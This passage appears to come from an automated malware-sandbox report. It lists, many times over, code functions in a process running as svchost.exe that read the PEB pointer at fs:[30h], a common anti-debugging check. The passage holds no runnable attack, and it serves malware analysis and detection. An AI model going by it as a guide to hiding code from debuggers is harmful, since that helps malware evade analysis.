Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]	1_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]	1_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]	1_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]	1_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]	1_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]	1_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03730750 mov eax, dword ptr fs:[00000030h]	1_2_03730750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037BE75D mov eax, dword ptr fs:[00000030h]	1_2_037BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772750 mov eax, dword ptr fs:[00000030h]	1_2_03772750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772750 mov eax, dword ptr fs:[00000030h]	1_2_03772750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B4755 mov eax, dword ptr fs:[00000030h]	1_2_037B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376674D mov esi, dword ptr fs:[00000030h]	1_2_0376674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376674D mov eax, dword ptr fs:[00000030h]	1_2_0376674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376674D mov eax, dword ptr fs:[00000030h]	1_2_0376674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376273C mov eax, dword ptr fs:[00000030h]	1_2_0376273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376273C mov ecx, dword ptr fs:[00000030h]	1_2_0376273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376273C mov eax, dword ptr fs:[00000030h]	1_2_0376273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AC730 mov eax, dword ptr fs:[00000030h]	1_2_037AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376C720 mov eax, dword ptr fs:[00000030h]	1_2_0376C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376C720 mov eax, dword ptr fs:[00000030h]	1_2_0376C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03730710 mov eax, dword ptr fs:[00000030h]	1_2_03730710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03760710 mov eax, dword ptr fs:[00000030h]	1_2_03760710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376C700 mov eax, dword ptr fs:[00000030h]	1_2_0376C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037347FB mov eax, dword ptr fs:[00000030h]	1_2_037347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037347FB mov eax, dword ptr fs:[00000030h]	1_2_037347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037527ED mov eax, dword ptr fs:[00000030h]	1_2_037527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037527ED mov eax, dword ptr fs:[00000030h]	1_2_037527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037527ED mov eax, dword ptr fs:[00000030h]	1_2_037527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037BE7E1 mov eax, dword ptr fs:[00000030h]	1_2_037BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373C7C0 mov eax, dword ptr fs:[00000030h]	1_2_0373C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B07C3 mov eax, dword ptr fs:[00000030h]	1_2_037B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037307AF mov eax, dword ptr fs:[00000030h]	1_2_037307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E47A0 mov eax, dword ptr fs:[00000030h]	1_2_037E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037D678E mov eax, dword ptr fs:[00000030h]	1_2_037D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03762674 mov eax, dword ptr fs:[00000030h]	1_2_03762674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037F866E mov eax, dword ptr fs:[00000030h]	1_2_037F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037F866E mov eax, dword ptr fs:[00000030h]	1_2_037F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376A660 mov eax, dword ptr fs:[00000030h]	1_2_0376A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376A660 mov eax, dword ptr fs:[00000030h]	1_2_0376A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0374C640 mov eax, dword ptr fs:[00000030h]	1_2_0374C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0374E627 mov eax, dword ptr fs:[00000030h]	1_2_0374E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03766620 mov eax, dword ptr fs:[00000030h]	1_2_03766620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03768620 mov eax, dword ptr fs:[00000030h]	1_2_03768620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373262C mov eax, dword ptr fs:[00000030h]	1_2_0373262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772619 mov eax, dword ptr fs:[00000030h]	1_2_03772619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AE609 mov eax, dword ptr fs:[00000030h]	1_2_037AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]	1_2_0374260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]	1_2_0374260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]	1_2_0374260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]	1_2_0374260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]	1_2_0374260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]	1_2_0374260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]	1_2_0374260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_037AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_037AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_037AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_037AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B06F1 mov eax, dword ptr fs:[00000030h]	1_2_037B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B06F1 mov eax, dword ptr fs:[00000030h]	1_2_037B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376A6C7 mov ebx, dword ptr fs:[00000030h]	1_2_0376A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376A6C7 mov eax, dword ptr fs:[00000030h]	1_2_0376A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037666B0 mov eax, dword ptr fs:[00000030h]	1_2_037666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376C6A6 mov eax, dword ptr fs:[00000030h]	1_2_0376C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03734690 mov eax, dword ptr fs:[00000030h]	1_2_03734690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03734690 mov eax, dword ptr fs:[00000030h]	1_2_03734690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376656A mov eax, dword ptr fs:[00000030h]	1_2_0376656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376656A mov eax, dword ptr fs:[00000030h]	1_2_0376656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376656A mov eax, dword ptr fs:[00000030h]	1_2_0376656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03738550 mov eax, dword ptr fs:[00000030h]	1_2_03738550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03738550 mov eax, dword ptr fs:[00000030h]	1_2_03738550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]	1_2_03740535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]	1_2_03740535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]	1_2_03740535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]	1_2_03740535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]	1_2_03740535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]	1_2_03740535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375E53E mov eax, dword ptr fs:[00000030h]	1_2_0375E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375E53E mov eax, dword ptr fs:[00000030h]	1_2_0375E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375E53E mov eax, dword ptr fs:[00000030h]	1_2_0375E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375E53E mov eax, dword ptr fs:[00000030h]	1_2_0375E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375E53E mov eax, dword ptr fs:[00000030h]	1_2_0375E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C6500 mov eax, dword ptr fs:[00000030h]	1_2_037C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]	1_2_03804500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]	1_2_03804500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]	1_2_03804500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]	1_2_03804500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]	1_2_03804500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]	1_2_03804500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]	1_2_03804500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037325E0 mov eax, dword ptr fs:[00000030h]	1_2_037325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376C5ED mov eax, dword ptr fs:[00000030h]	1_2_0376C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376C5ED mov eax, dword ptr fs:[00000030h]	1_2_0376C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037365D0 mov eax, dword ptr fs:[00000030h]	1_2_037365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376A5D0 mov eax, dword ptr fs:[00000030h]	1_2_0376A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376A5D0 mov eax, dword ptr fs:[00000030h]	1_2_0376A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376E5CF mov eax, dword ptr fs:[00000030h]	1_2_0376E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376E5CF mov eax, dword ptr fs:[00000030h]	1_2_0376E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037545B1 mov eax, dword ptr fs:[00000030h]	1_2_037545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037545B1 mov eax, dword ptr fs:[00000030h]	1_2_037545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B05A7 mov eax, dword ptr fs:[00000030h]	1_2_037B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B05A7 mov eax, dword ptr fs:[00000030h]	1_2_037B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B05A7 mov eax, dword ptr fs:[00000030h]	1_2_037B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376E59C mov eax, dword ptr fs:[00000030h]	1_2_0376E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03732582 mov eax, dword ptr fs:[00000030h]	1_2_03732582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03732582 mov ecx, dword ptr fs:[00000030h]	1_2_03732582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03764588 mov eax, dword ptr fs:[00000030h]	1_2_03764588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375A470 mov eax, dword ptr fs:[00000030h]	1_2_0375A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375A470 mov eax, dword ptr fs:[00000030h]	1_2_0375A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375A470 mov eax, dword ptr fs:[00000030h]	1_2_0375A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037BC460 mov ecx, dword ptr fs:[00000030h]	1_2_037BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037EA456 mov eax, dword ptr fs:[00000030h]	1_2_037EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372645D mov eax, dword ptr fs:[00000030h]	1_2_0372645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375245A mov eax, dword ptr fs:[00000030h]	1_2_0375245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]	1_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]	1_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]	1_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]	1_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]	1_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]	1_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]	1_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]	1_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372E420 mov eax, dword ptr fs:[00000030h]	1_2_0372E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372E420 mov eax, dword ptr fs:[00000030h]	1_2_0372E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372E420 mov eax, dword ptr fs:[00000030h]	1_2_0372E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372C427 mov eax, dword ptr fs:[00000030h]	1_2_0372C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]	1_2_037B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]	1_2_037B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]	1_2_037B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]	1_2_037B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]	1_2_037B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]	1_2_037B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]	1_2_037B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03768402 mov eax, dword ptr fs:[00000030h]	1_2_03768402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03768402 mov eax, dword ptr fs:[00000030h]	1_2_03768402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03768402 mov eax, dword ptr fs:[00000030h]	1_2_03768402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037304E5 mov ecx, dword ptr fs:[00000030h]	1_2_037304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037644B0 mov ecx, dword ptr fs:[00000030h]	1_2_037644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037BA4B0 mov eax, dword ptr fs:[00000030h]	1_2_037BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037364AB mov eax, dword ptr fs:[00000030h]	1_2_037364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037EA49A mov eax, dword ptr fs:[00000030h]	1_2_037EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372CB7E mov eax, dword ptr fs:[00000030h]	1_2_0372CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03728B50 mov eax, dword ptr fs:[00000030h]	1_2_03728B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DEB50 mov eax, dword ptr fs:[00000030h]	1_2_037DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E4B4B mov eax, dword ptr fs:[00000030h]	1_2_037E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E4B4B mov eax, dword ptr fs:[00000030h]	1_2_037E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C6B40 mov eax, dword ptr fs:[00000030h]	1_2_037C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C6B40 mov eax, dword ptr fs:[00000030h]	1_2_037C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037FAB40 mov eax, dword ptr fs:[00000030h]	1_2_037FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037D8B42 mov eax, dword ptr fs:[00000030h]	1_2_037D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375EB20 mov eax, dword ptr fs:[00000030h]	1_2_0375EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375EB20 mov eax, dword ptr fs:[00000030h]	1_2_0375EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037F8B28 mov eax, dword ptr fs:[00000030h]	1_2_037F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037F8B28 mov eax, dword ptr fs:[00000030h]	1_2_037F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]	1_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]	1_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]	1_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]	1_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]	1_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]	1_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]	1_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]	1_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]	1_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03804B00 mov eax, dword ptr fs:[00000030h]	1_2_03804B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03738BF0 mov eax, dword ptr fs:[00000030h]	1_2_03738BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03738BF0 mov eax, dword ptr fs:[00000030h]	1_2_03738BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03738BF0 mov eax, dword ptr fs:[00000030h]	1_2_03738BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375EBFC mov eax, dword ptr fs:[00000030h]	1_2_0375EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037BCBF0 mov eax, dword ptr fs:[00000030h]	1_2_037BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DEBD0 mov eax, dword ptr fs:[00000030h]	1_2_037DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03750BCB mov eax, dword ptr fs:[00000030h]	1_2_03750BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03750BCB mov eax, dword ptr fs:[00000030h]	1_2_03750BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03750BCB mov eax, dword ptr fs:[00000030h]	1_2_03750BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03730BCD mov eax, dword ptr fs:[00000030h]	1_2_03730BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03730BCD mov eax, dword ptr fs:[00000030h]	1_2_03730BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03730BCD mov eax, dword ptr fs:[00000030h]	1_2_03730BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740BBE mov eax, dword ptr fs:[00000030h]	1_2_03740BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740BBE mov eax, dword ptr fs:[00000030h]	1_2_03740BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E4BB0 mov eax, dword ptr fs:[00000030h]	1_2_037E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E4BB0 mov eax, dword ptr fs:[00000030h]	1_2_037E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03802B57 mov eax, dword ptr fs:[00000030h]	1_2_03802B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03802B57 mov eax, dword ptr fs:[00000030h]	1_2_03802B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03802B57 mov eax, dword ptr fs:[00000030h]	1_2_03802B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03802B57 mov eax, dword ptr fs:[00000030h]	1_2_03802B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03804A80 mov eax, dword ptr fs:[00000030h]	1_2_03804A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037ACA72 mov eax, dword ptr fs:[00000030h]	1_2_037ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037ACA72 mov eax, dword ptr fs:[00000030h]	1_2_037ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376CA6F mov eax, dword ptr fs:[00000030h]	1_2_0376CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376CA6F mov eax, dword ptr fs:[00000030h]	1_2_0376CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376CA6F mov eax, dword ptr fs:[00000030h]	1_2_0376CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DEA60 mov eax, dword ptr fs:[00000030h]	1_2_037DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]	1_2_03736A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]	1_2_03736A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]	1_2_03736A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]	1_2_03736A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]	1_2_03736A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]	1_2_03736A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]	1_2_03736A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740A5B mov eax, dword ptr fs:[00000030h]	1_2_03740A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740A5B mov eax, dword ptr fs:[00000030h]	1_2_03740A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03754A35 mov eax, dword ptr fs:[00000030h]	1_2_03754A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03754A35 mov eax, dword ptr fs:[00000030h]	1_2_03754A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376CA24 mov eax, dword ptr fs:[00000030h]	1_2_0376CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375EA2E mov eax, dword ptr fs:[00000030h]	1_2_0375EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037BCA11 mov eax, dword ptr fs:[00000030h]	1_2_037BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376AAEE mov eax, dword ptr fs:[00000030h]	1_2_0376AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376AAEE mov eax, dword ptr fs:[00000030h]	1_2_0376AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03730AD0 mov eax, dword ptr fs:[00000030h]	1_2_03730AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03764AD0 mov eax, dword ptr fs:[00000030h]	1_2_03764AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03764AD0 mov eax, dword ptr fs:[00000030h]	1_2_03764AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03786ACC mov eax, dword ptr fs:[00000030h]	1_2_03786ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03786ACC mov eax, dword ptr fs:[00000030h]	1_2_03786ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03786ACC mov eax, dword ptr fs:[00000030h]	1_2_03786ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03738AA0 mov eax, dword ptr fs:[00000030h]	1_2_03738AA0
